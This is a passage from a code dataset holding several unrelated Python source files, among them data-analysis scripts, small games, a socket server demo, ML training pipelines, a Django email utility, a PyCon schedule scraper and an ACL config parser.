below_diam_mass # 该段透筛的小颗粒总质量/所有透筛颗粒的小颗粒总质量\n list_section_ratio.append(section_ratio * 100) # 百分比形式\n section_name = ['sec1_pntr', 'sec2_pntr', 'sec3_pntr', 'sec4_pntr', 'sec5_pntr']\n df_section_ratio = pd.DataFrame([list_section_ratio], columns=section_name)\n\n return df_section_ratio\n\n\nif __name__ == '__main__':\n # 记录程序开始时间\n start = time.time()\n\n # CSV文件的完整路径\n folder_path = r'H:\\Data'\n file_name = r'exp002.csv'\n file_path = os.path.join(folder_path, file_name)\n # 调用csv_process.py中data_process函数,处理该路径下的CSV文件的数据\n x_b, incline_angle, data_times_list = data_process(file_path)\n # 将上一步返回的data_times_list作为变量,调用mass_position_times进一步计算颗粒的质量以及筛网的位置\n data_times_list = mass_position_times(data_times_list, incline_angle)\n\n # <1.计算测试>\n # 如果测试的筛分结束时刻存在某个筛段没有颗粒透筛,程序会提示关于‘ptc_diam’的错误!\n 
section_ratio_df = ptc_section_ratio(data_times_list, x_b, 200, 0.9)\n print(section_ratio_df)\n # <统计计算时间>\n end = time.time()\n # 计算并输出程序计算时间\n cal_time = end - start\n m, s = divmod(cal_time, 60)\n h, m = divmod(m, 60)\n print(\"\\nTotal Computing Time: %02d:%02d:%02d\" % (h, m, s))\n\n # <2.可视化测试>\n fig = plt.figure()\n ax = plt.Subplot(fig, 111)\n fig.add_axes(ax)\n plt.title('Stratification Ratio of Each Section', y=1.05, fontname='Times New Roman', weight='bold', fontsize=30)\n plt.xlabel('Screen Section', fontname='Times New Roman', weight='bold', fontsize=25)\n plt.ylabel('Stratification Ratio', fontname='Times New Roman', weight='bold', fontsize=25)\n plt.tick_params(axis='both', labelsize=10)\n # 常用数据标记形状:圆‘o’、三角形‘^’(4种,尖角代表方向)、四边形‘s’、五边形‘p’、六边形‘h’、星号‘*’\n plt.plot(list(range(1, 6)), section_ratio_df.iloc[0].tolist(), lw=2, c='black',\n marker='s', ms=10, mfc='c', mec='black', mew=2)\n plt.grid(True)\n plt.show()\n","sub_path":"Vibrating_Screen/cal_eff/scn_section_pntrt.py","file_name":"scn_section_pntrt.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"349847462","text":"# simu - Robot simulation. {{{\n#\n# Copyright (C) 2010 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
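The scn_section_pntrt.py record above builds its five equal screen sections with np.linspace and then assigns each penetrating particle to a section by a linear scan over the intervals. A small sketch of the same binning; np.digitize is shown here as an assumed vectorized alternative, not what the record itself uses:

```python
import numpy as np

# Divide [left, right] into 5 equal sections, as section_split does.
left, right = 0.0, 100.0
edges = np.linspace(left, right, 5 + 1)          # 6 edges -> 5 sections
intervals = list(zip(edges[:-1], edges[1:]))     # [(0, 20), (20, 40), ...]

# Assign sample x positions to a section index in one vectorized call.
xs = np.array([3.0, 55.5, 99.9])
section_idx = np.digitize(xs, edges[1:-1])       # values in 0..4
print(intervals)
print(section_idx)                               # [0 2 4]
```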
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\n\"\"\"Generic ultra sonic distance sensor (use several rays).\"\"\"\nfrom simu.inter.drawable import Drawable\nfrom simu.view.distance_sensor import DistanceSensor\n\nclass DistanceSensorUS (Drawable):\n\n def __init__ (self, onto, model):\n Drawable.__init__ (self, onto)\n self.model = model\n self.rays = [ ]\n for r in model.rays:\n self.rays.append (DistanceSensor (onto, r))\n\n","sub_path":"host/simu/view/distance_sensor_us.py","file_name":"distance_sensor_us.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"441326608","text":"import pygame\r\npygame.init()\r\n\r\nclass Tile( pygame.sprite.Sprite ):\r\n\t\"\"\"\r\n\t\"\"\"\r\n\tdef __init__( self, top, left, size, color ):\r\n\t\tpygame.sprite.Sprite.__init__( self )\r\n\r\n\t\tself.image = pygame.Surface( ( size, size ) )\r\n\t\tself.rect = self.image.get_rect( topleft = ( top, left ) )\r\n\t\tself.image.fill( color )\r\n\r\n\t\tself._top = top\r\n\t\tself._left = left\r\n\t\tself._size = size\r\n\t\tself._color = color\r\n","sub_path":"game/classes/Tile.py","file_name":"Tile.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626119774","text":"# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nimport sys\nimport glob, os, shutil, filecmp\n\nPYTHON = sys.executable\n\nfiles = sorted( glob.glob( 't*.py' ) )\n\nif( os.path.exists( 'Out' ) ) : shutil.rmtree( 'Out' )\nos.mkdir( 'Out' )\n\nfor file in files :\n base = file[:-3]\n status = os.system( '%s %s > Out/%s.out' % ( PYTHON, file, base ) )\n if( status ) : print( '=========== %s ===========' % file )\n\nouts = sorted( glob.glob( 'Out/t*.out' ) )\nfor out in outs :\n file = os.path.basename( out )\n if( not( filecmp.cmp( os.path.join( 'Out.checked', file ), out ) ) ) : print( 'ERROR: %s' % out )\n","sub_path":"pqu/Check/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398287854","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/insights/parsers/tests/test_azure_instance_type.py\n# Compiled at: 2020-03-25 13:10:41\nimport pytest, doctest\nfrom insights.parsers import azure_instance_type\nfrom insights.parsers.azure_instance_type import AzureInstanceType\nfrom insights.tests import context_wrap\nfrom insights.parsers import SkipException, ParseException\nfrom insights.core.plugins import ContentException\nAZURE_TYPE_1 = 'Standard_L32s'\nAZURE_TYPE_2 = 'Standard_NV48s_v3'\nAZURE_TYPE_3 = '\\n % Total % Received % Xferd Average Speed Time Time Time Current\\n Dload Upload Total Spent Left Speed\\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\\n 100 1126 100 1126 0 0 1374k 0 --:--:-- --:--:-- --:--:-- 1099k\\nStandard_NV48s_v3\\n'\nAZURE_TYPE_DOC = 'Standard_L64s_v2'\nAZURE_TYPE_AB_1 = ('\\ncurl: (7) Failed to connect to 
169.254.169.254 port 80: Connection timed out\\n').strip()\nAZURE_TYPE_AB_2 = (\"\\ncurl: (7) couldn't connect to host\\n\").strip()\nAZURE_TYPE_AB_3 = ('\\ncurl: (28) connect() timed out!\\n').strip()\nAZURE_TYPE_AB_4 = ('\\n.micro\\n').strip()\nAZURE_TYPE_AB_5 = ('\\nNo module named insights.tools\\n').strip()\n\ndef test_azure_instance_type_ab_other():\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_1))\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_2))\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_3))\n with pytest.raises(ParseException) as (pe):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_4))\n assert 'Unrecognized type' in str(pe)\n with pytest.raises(ContentException) as (pe):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_5))\n\n\ndef test_azure_instance_type_ab_empty():\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(''))\n\n\ndef test_azure_instance_type():\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_1))\n assert azure.type == 'Standard'\n assert azure.size == 'L32s'\n assert azure.version is None\n assert azure.raw == 'Standard_L32s'\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_2))\n assert azure.type == 'Standard'\n assert azure.size == 'NV48s'\n assert azure.version == 'v3'\n assert azure.raw == 'Standard_NV48s_v3'\n assert 'NV48s' in str(azure)\n return\n\n\ndef test_azure_instance_type_stats():\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_3))\n assert azure.type == 'Standard'\n assert azure.size == 'NV48s'\n assert azure.version == 'v3'\n assert azure.raw == 'Standard_NV48s_v3'\n\n\ndef test_doc_examples():\n env = {'azure_inst': AzureInstanceType(context_wrap(AZURE_TYPE_DOC))}\n failed, total = doctest.testmod(azure_instance_type, globs=env)\n assert failed == 0","sub_path":"pycfiles/insights_core-3.0.160-py2.7/test_azure_instance_type.py","file_name":"test_azure_instance_type.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286594117","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import metrics\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom transformers import get_linear_schedule_with_warmup\n\nimport config\nimport dataset\nimport engine\nimport model\n\nif __name__ == \"__main__\":\n # Data preprocessing\n df = pd.read_csv(\"../input/data/train.csv\")\n df['list'] = df[df.columns[3:]].values.tolist()\n new_df = df[['TITLE', 'ABSTRACT', 'list']].copy()\n\n # Creating Dataset and Dataloaders\n train_size = 0.8\n train_dataset = new_df.sample(frac=train_size, random_state=200)\n test_dataset = new_df.drop(train_dataset.index).reset_index(drop=True)\n train_dataset = train_dataset.reset_index(drop=True)\n\n print(\"FULL Dataset: {}\".format(new_df.shape))\n print(\"TRAIN Dataset: {}\".format(train_dataset.shape))\n print(\"TEST Dataset: {}\".format(test_dataset.shape))\n\n training_set = dataset.CustomDataset(train_dataset, config.TOKENIZER, config.MAX_LEN)\n testing_set = dataset.CustomDataset(test_dataset, config.TOKENIZER, config.MAX_LEN)\n\n train_params = {'batch_size': config.TRAIN_BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0\n }\n\n test_params = {'batch_size': config.VALID_BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0\n }\n\n training_loader = DataLoader(training_set, **train_params)\n testing_loader = DataLoader(testing_set, **test_params)\n\n # GPU check and setting the 
device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n n_gpu = torch.cuda.device_count()\n print(torch.cuda.get_device_name(0))\n\n # Object of ScibertBiLstmClass and setting to device\n model = model.ScibertBiLstmClass()\n model.to(device)\n\n # Model parameters\n param_optimizer = list(model.named_parameters())\n no_decay = [\"bias\", \"LayerNorm.bias\", \"LayerNorm.weight\"]\n optimizer_parameters = [\n {\n \"params\": [\n p for n, p in param_optimizer if not any(nd in n for nd in no_decay)\n ],\n \"weight_decay\": 0.001,\n },\n {\n \"params\": [\n p for n, p in param_optimizer if any(nd in n for nd in no_decay)\n ],\n \"weight_decay\": 0.0,\n },\n ]\n\n # Optimizer and Scheduler\n optimizer = torch.optim.AdamW(optimizer_parameters, lr=3e-5)\n num_training_steps = int(len(train_dataset) / config.TRAIN_BATCH_SIZE * config.EPOCHS)\n\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=num_training_steps\n )\n\n # Training loop\n best_micro = 0\n for epoch in range(config.EPOCHS):\n engine.train(epoch, model, training_loader, device, optimizer, scheduler)\n outputs, targets = engine.validation(epoch, model, testing_loader, device)\n outputs = np.array(outputs) >= 0.5\n accuracy = metrics.accuracy_score(targets, outputs)\n f1_score_micro = metrics.f1_score(targets, outputs, average='micro')\n f1_score_macro = metrics.f1_score(targets, outputs, average='macro')\n print(f\"Accuracy Score = {accuracy}\")\n print(f\"F1 Score (Micro) = {f1_score_micro}\")\n print(f\"F1 Score (Macro) = {f1_score_macro}\")\n if f1_score_micro > best_micro:\n torch.save(model.state_dict(), config.MODEL_PATH)\n best_micro = f1_score_micro","sub_path":"scibert-bilstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
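The train.py record above splits the model's parameters into a weight-decay group and a no-decay group (biases and LayerNorm weights) before handing them to AdamW — a common transformer fine-tuning convention. A condensed sketch of just that grouping step; the tiny two-layer model is a stand-in for the record's ScibertBiLstmClass:

```python
from collections import OrderedDict
import torch

# Named submodules so parameter names carry the "LayerNorm" marker.
model = torch.nn.Sequential(OrderedDict([
    ("encoder", torch.nn.Linear(8, 4)),
    ("LayerNorm", torch.nn.LayerNorm(4)),
]))
no_decay = ["bias", "LayerNorm.weight"]

groups = [
    # decay group: parameters whose name matches none of the no_decay markers
    {"params": [p for n, p in model.named_parameters()
                if not any(nd in n for nd in no_decay)],
     "weight_decay": 0.001},
    # no-decay group: biases and LayerNorm scale parameters
    {"params": [p for n, p in model.named_parameters()
                if any(nd in n for nd in no_decay)],
     "weight_decay": 0.0},
]
optimizer = torch.optim.AdamW(groups, lr=3e-5)
```

The grouping relies purely on substring matching over parameter names, so whether a parameter skips decay depends on how its parent module is named.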
< 4:\n bomb = Config.ARR[x_val - 2][y_val] != 'E' and Config.ARR[x_val\n - 2][y_val].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val - 2][y_val]\n or '/' in Config.ARR[x_val - 2][y_val]\n or 'e' in Config.ARR[x_val - 2][y_val]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val - 2, y_val)\n j = j + 1\n\n def movedown(self):\n ''' move down '''\n [x_val, y_val] = self.getposition()\n i = [0, 1, 2, 3, 4]\n j = 0\n while i[j] < 4:\n bomb = Config.ARR[x_val + 2][y_val] != 'E' and Config.ARR[x_val\n + 2][y_val].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val + 2][y_val]\n or '/' in Config.ARR[x_val + 2][y_val]\n or 'e' in Config.ARR[x_val + 2][y_val]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val + 2, y_val)\n j = j + 1\n\n def death(self):\n ''' player death '''\n self.lives = self.lives - 1\n\n def bomberkiller(self, bomb):\n ''' kill enemy '''\n [x_val1, y_val1] = bomb.getposition()\n [x_val, y_val] = self.getposition()\n if x_val1 == x_val and y_val1 != y_val and True:\n if abs(y_val1 - y_val) <= 4:\n self.death()\n return True\n if y_val1 == y_val and x_val1 != x_val and True:\n if abs(x_val1 - x_val) <= 2:\n self.death()\n return True\n return False\n","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149809869","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nBuild a simple Question Classifier using TF-IDF or Bag of Words Model\n\"\"\"\n\nimport sys\nimport json\nimport io\nimport os\n\nimport numpy\n\nfrom sklearn.datasets import load_files\nfrom sklearn import metrics\nfrom sklearn.externals import joblib\nfrom sklearn.pipeline import Pipeline, FeatureUnion\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer, TfidfTransformer\nfrom sklearn.feature_extraction import DictVectorizer\n\nfrom matplotlib import pyplot\n\n\nfrom sklearn.linear_model import SGDClassifier\nfrom lightgbm import LGBMClassifier\n\nimport io\nimport json\n\nimport jieba\nimport jieba.posseg as pseg\nimport gensim\n\nfrom constant import id2category\n\n\nclass ClassifierWrapper(BaseEstimator, TransformerMixin):\n\n def __init__(self, estimator, verbose=None, fit_params=None, use_proba=True, scoring=None):\n self.estimator = estimator\n self.verbose = verbose # True = 1, False = 0, 1 - moderately verbose, 2- extra verbose\n if verbose is None:\n self.verbose = 0\n else:\n self.verbose = verbose\n self.fit_params = fit_params\n self.use_proba = use_proba # whether to use predict_proba in transform\n self.scoring = scoring # calculate validation score, takes score function name\n # TODO check if scorer imported?\n self.score = None # variable to keep the score if scoring is set.\n\n def fit(self, X, y):\n fp = self.fit_params\n if self.verbose == 2:\n print(\"X: \", X.shape, \"\\nFit params:\", self.fit_params)\n\n if fp is not None:\n self.estimator.fit(X, y, **fp)\n else:\n self.estimator.fit(X, y)\n\n return self\n\n def transform(self, X):\n if self.use_proba:\n return self.estimator.predict_proba(X) # [:, 1].reshape(-1,1)\n else:\n return self.estimator.predict(X)\n\n def fit_transform(self, X, y, **kwargs):\n self.fit(X, y)\n p = self.transform(X)\n if self.scoring is not None:\n self.score = eval(self.scoring+\"(y,p)\")\n # TODO print own instance name?\n if self.verbose > 0:\n print(\"score: \", 
self.score)\n return p\n\n def predict(self, X):\n return self.estimator.predict(X)\n\n def predict_proba(self, X):\n return self.estimator.predict_proba(X)\n\n\ndef tokenize(text):\n # return jieba.lcut(text)\n return list(text)\n\n\ndef save_model(grid, filename='../model/xgb.pkl'):\n joblib.dump(grid, filename, compress=1)\n\n\ndef load_model(filename='../model/xgb.pkl'):\n grid = joblib.load(filename)\n return grid\n\n\nclass TextStats(BaseEstimator, TransformerMixin):\n \"\"\"Extract features from each document for DictVectorizer\"\"\"\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, x):\n with io.open('../data/kp.bson', encoding='utf8') as f:\n concepts = set()\n for line in f.readlines():\n concepts.add(json.loads(line.strip())['concept'])\n\n return [{\n 'length': len(text),\n # 'concept_cnt': sum([1 for t in concepts if t in text]),\n # 'ratio_word': len(jieba.lcut(text)) * 1. / len(text) if len(text) else 0,\n # 'ratio_repeat': len(set(text)) * 1. / len(text) if len(text) else 0,\n # 'ratio_alpha': sum([1 for t in text if t.isalpha()]) / len(text) if len(text) else 0\n } for text in x]\n\n\ndef train():\n # the training data folder must be passed as first argument\n dataset_train = load_files(\n '../data/svm/train', shuffle=False, encoding='utf8')\n dataset_test = load_files(\n '../data/svm/test', shuffle=False, encoding='utf8')\n print(\"n_samples: %d\" % len(dataset_train.data))\n\n docs_train, docs_test = dataset_train.data, dataset_test.data\n y_train, y_test = dataset_train.target, dataset_test.target\n\n # split the dataset in training and test set:\n\n model = LGBMClassifier()\n\n print(model)\n text_clf = Pipeline([(\n 'features', FeatureUnion([\n ('tfidf', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, ngram_range=(1, 3))),\n ('tfidf', TfidfTransformer())\n ])),\n ('stats', Pipeline([\n ('stats', TextStats()),\n ('vect', DictVectorizer())\n ])),\n # ('sgd', Pipeline([\n # ('vect', CountVectorizer(tokenizer=tokenize, ngram_range=(1, 3))),\n # ('tfidf', TfidfTransformer()),\n # ('sgd', ClassifierWrapper(SGDClassifier(loss='log')))\n # ])),\n ])),\n ('clf', model)\n ])\n\n text_clf.fit(docs_train, y_train)\n\n y_predicted = text_clf.predict(docs_test)\n\n # Print the classification report\n print(metrics.classification_report(y_test, y_predicted,\n target_names=dataset_test.target_names))\n\n # Print and plot the confusion matrix\n cm = metrics.confusion_matrix(y_test, y_predicted)\n print(cm)\n\n save_model(text_clf)\n\n print(model.feature_importances_)\n\n # plot_importance(model)\n # pyplot.show()\n\n\ndef predict(clf, question):\n return clf.predict([question])[0]\n\n\ndef predict_proba(clf, question):\n return clf.predict_proba([question])\n\n\nif __name__ == \"__main__\":\n train()\n grid = load_model()\n question = u'数据结构当中的图怎么都弄不懂怎么办？'\n print(predict(grid, question))\n print(predict_proba(grid, question))\n","sub_path":"sklearn_baseline/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
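The ensemble.py record above concatenates character-n-gram TF-IDF features with hand-built dictionary statistics through a FeatureUnion before the final classifier. A self-contained miniature of that wiring on toy data; LogisticRegression stands in for the record's LGBMClassifier so the sketch needs only scikit-learn:

```python
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import FeatureUnion, Pipeline

class LengthStats(BaseEstimator, TransformerMixin):
    """Emit one dict of numeric features per document (simplified TextStats)."""
    def fit(self, x, y=None):
        return self
    def transform(self, x):
        return [{"length": len(text)} for text in x]

clf = Pipeline([
    ("features", FeatureUnion([
        # sparse character n-gram TF-IDF block
        ("tfidf", TfidfVectorizer(analyzer="char", ngram_range=(1, 2))),
        # dense hand-made statistics, vectorized from dicts
        ("stats", Pipeline([("extract", LengthStats()),
                            ("vect", DictVectorizer())])),
    ])),
    ("model", LogisticRegression(max_iter=1000)),
])

docs = ["how do graphs work", "what is a linked list", "hello", "hi there"]
labels = [1, 1, 0, 0]
clf.fit(docs, labels)
print(clf.predict(["how do linked lists work"]))
```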
{\n \"1212\": 6,\n \"1221\": 0,\n \"123425\": 4,\n \"123123\": 12,\n \"12131415\": 4,\n}\nfor test_data, expected in tests_b.items():\n assert part_b(test_data) == expected\n\nprint(\"part a:\", part_a(data))\nprint(\"part b:\", part_b(data))\n","sub_path":"aoc_wim/aoc2017/q01.py","file_name":"q01.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593062494","text":"import matplotlib.pyplot as plt\r\nimport h5py\r\n\r\nfor i in range(1,6):\r\n filename=\"data_\"+str(i)+\".h5\"\r\n f=h5py.File(filename,'r')\r\n l=list(f.keys())\r\n attri=f[l[0]]\r\n label=f[l[1]]\r\n\r\n for j in range(label.shape[0]):\r\n if(label[j]==0):\r\n c1=plt.scatter(attri[j,0],attri[j,1],c='m')\r\n elif(label[j]==1):\r\n c2=plt.scatter(attri[j,0],attri[j,1],c='r')\r\n elif(label[j]==2):\r\n c3=plt.scatter(attri[j,0],attri[j,1],c='b')\r\n\r\n plt.title(\"Scatter Plot for Dataset \"+str(i))\r\n if(i==3):\r\n plt.legend((c1,c2,c3),(\"Class 0\",\"Class 1\",\"Class 2\"))\r\n else:\r\n plt.legend((c1,c2),(\"Class 0\",\"Class 1\")) \r\n plt.show()\r\n\r\n \r\n \r\n \r\n\r\n","sub_path":"Assignment 2/1A.py","file_name":"1A.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252186801","text":"'''\n 阻塞IO服务端\n'''\n\nimport socket\nimport time\n\nserver = socket.socket()\nserver.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\nserver.bind(('127.0.0.1',8083))\nserver.listen(5)\nprint('卡哪儿了')\nserver.setblocking(False)\n\nrlist = []\nrl = []\n\nwhile 1:\n try:\n conn,addr = server.accept()\n print(addr)\n rlist.append(conn)\n print('来自%s:%s的链接请求' % (addr[0],addr[1]))\n except BlockingIOError:\n print('去买点药')\n\n time.sleep(0.1)\n print('rlist',rlist,len(rlist))\n\n for con in rlist:\n try:\n from_client_msg = con.recv(1024)\n except BlockingIOError:\n continue\n except ConnectionResetError:\n con.close()\n rl.append(con)\n print('>>>>',rl)\n for remove_con in rl:\n rlist.remove(remove_con)\n rl.clear()\n\n\n","sub_path":"day29/05-阻塞IO的socket服务端.py","file_name":"05-阻塞IO的socket服务端.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421923852","text":"#compare two list, two dicts\nfirstlist = ['cats','dogs',55]\nsecondlist = ['dogs',55,'cats']\nprint(firstlist == secondlist)\n\nfirstDict= {'name':'Apiwat', 'species':'inhuman', 'age':'999'}\nsecondDict={'species':'inhuman', 'age':'999','name':'Apiwat'}\nprint(firstDict==secondDict)\n\nmyCat = {'size':'small', 'color':'white','disposition':'loud'}\nprint('My cat has ' + myCat['color']+ 'fur.')","sub_path":"ON/ZhihanShi/Module3/dictionary_data_type.py","file_name":"dictionary_data_type.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372406106","text":"from django.http import JsonResponse\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom django.core.validators import validate_email\n\nfrom django.http import HttpResponse\nimport csv\nimport io\n\nimport logging\nfrom django.conf import settings\n\nlogger = logging.getLogger('django')\n\n# @app.task(bind=True)\ndef send_email(subject, body, to):\n if not isinstance(to, list):\n to = [to]\n\n try:\n to = list(map(str, to))\n for email in to:\n validate_email(email)\n except Exception as 
e:\n return False, 'Invalid emails'\n\n msg = MIMEMultipart()\n msg['From'] = settings.EMAIL_HOST_USER\n msg['To'] = ','.join(to)\n msg['Subject'] = str(subject)\n msg.attach(MIMEText(str(body), 'html'))\n text = msg.as_string()\n try:\n server = smtplib.SMTP_SSL(':'.join([settings.EMAIL_HOST, str(settings.EMAIL_PORT)]))\n server.login(settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD)\n server.sendmail(settings.DEFAULT_FROM_EMAIL, to, text)\n server.close()\n return True, True\n except Exception as e:\n logger.error(str(e))\n return False, str(e)\n\n\ndef generate_csv_response(ser, queryset, is_dict=False, append_csv_field=False):\n out = io.StringIO()\n csv_writer = csv.writer(out)\n\n if not is_dict and append_csv_field:\n for q in list(queryset):\n q.csv = True\n\n objects = []\n if is_dict:\n serialized = ser(data=queryset, many=True)\n serialized.is_valid(raise_exception=True)\n objects = serialized.data\n else:\n objects = ser(queryset, many=True).data\n\n if objects:\n csv_writer.writerow(objects[0].keys())\n\n for obj in objects:\n csv_writer.writerow(obj.values())\n\n response = HttpResponse(out.getvalue(), content_type=\"application/csv\")\n response['Content-Disposition'] = 'attachment;filename=data.csv'\n return response\n\n\ndef _get_queryset(cls, key):\n if hasattr(cls, '_default_manager'):\n return cls._default_manager.get(pk=key)\n return cls\n\n\ndef get_object_or_404(cls, key):\n try:\n _object = _get_queryset(cls, key)\n return _object, True\n except Exception as e:\n logger.error(e)\n return JsonResponse({\"status\": \"error\", \"desc\": \"Not found\", \"detail\": str(e)}, status=404), False\n","sub_path":"back_api/back_api/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461657848","text":"\"\"\"\nScrape the schedule for accepted talks.\n\nProduces a JSON file suitable for passing as a --data argument to email-authors.\nI use this to to send a preview of when their talks are scheduled (see\nemail-templates/check-schedule-template.txt).\n\"\"\"\n\nimport argparse\nimport dateutil.parser\nimport json\nimport lxml.html\nimport sys\nimport urllib\nimport pycon_bot.mongo\nfrom pycon_bot.models import TalkProposal\n\n# Where's the schedue list?\nURL = 'https://us.pycon.org/2013/schedule/talks/list/'\n\n# Map and normalize days to datetimes\nDAY_MAP = {\n 'Friday': 'Friday, March 15th',\n 'Saturday': 'Saturday, March 16th',\n 'Sunday': 'Sunday, March 17th',\n}\n\np = argparse.ArgumentParser()\np.add_argument('--dsn', help=\"Mongo DSN\")\nargs = p.parse_args()\nif not pycon_bot.mongo.connect(args.dsn):\n p.error(\"Need to pass --dsn or set env[MONGO_DSN].\")\n\ndoc = lxml.html.parse(urllib.urlopen('https://us.pycon.org/2013/schedule/talks/list/')).getroot()\ndata = {}\n\nfor div in doc.cssselect('div.presentation'):\n # Find the link so we can look up which talk_id this refers to\n link = 'https://us.pycon.org' + div.find('h3/a').attrib['href']\n talk = TalkProposal.objects.get(public_url=link)\n\n # Parse out the scheduled timeslot\n schedule_text = div.findall('h4')[-1].text.strip()\n day, startstop, _, _ = [t.strip() for t in schedule_text.split('\\n')]\n start, stop = startstop.replace('noon', '12:00 pm').split(u'\\u2013')\n slot_length = dateutil.parser.parse(stop) - dateutil.parser.parse(start)\n\n data[talk.talk_id] = {\n 'day': DAY_MAP[day],\n 'start': start,\n 'stop': stop,\n 'length': '%i minutes' % (slot_length.total_seconds() / 
60),\n }\n\njson.dump(data, sys.stdout, indent=2)\n","sub_path":"scripts/scrape-schedule.py","file_name":"scrape-schedule.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"405014194","text":"import os, re\n\nclass AclConfig:\n def __init__(self):\n self.bfname = ''\n self.logname = ''\n self.bfdate = ''\n self.remark = ''\n self.permit = ''\n self.permittype = ''\n\ndef getaclconfig(fileinsertlist, source_path, acllist):\n source_path = os.chdir(source_path)\n for filename in fileinsertlist:\n filename = filename.rstrip()\n data = None\n with open(filename, 'r') as text:\n data = text.read().rstrip()\n bfname = filename\n logname = filename[:12]\n bfdate = filename[13:28]\n accesslist = re.compile('configure ipv6 access\\-list (.*) permit *ip *(.*) |configure access\\-list (.*) '\n 'permit *(.*)|configure access\\-list (.*) remark *\\\"(.*)\\\"|configure ipv6 access\\-list '\n '(.*) * remark *\\\"(.*)\\\"')\n for v6type,v6permit,v4type,v4permit,v4remarktype,v4remark,v6remarktype,v6remark in re.findall(accesslist, data):\n aclobject = AclConfig()\n if v4remark != '':\n group = 'v4'\n remark = v4remark\n remarktype = v4remarktype\n elif v6remark != '':\n group = 'v6'\n remark = v6remark\n remarktype = v6remarktype\n elif group == 'v4' and v4type != '' and v4permit != '':\n aclobject.logname = logname\n aclobject.bfname = bfname\n aclobject.bfdate = bfdate\n aclobject.remark = remark\n aclobject.permittype = remarktype\n aclobject.permit = v4permit\n acllist.append(aclobject)\n elif group == 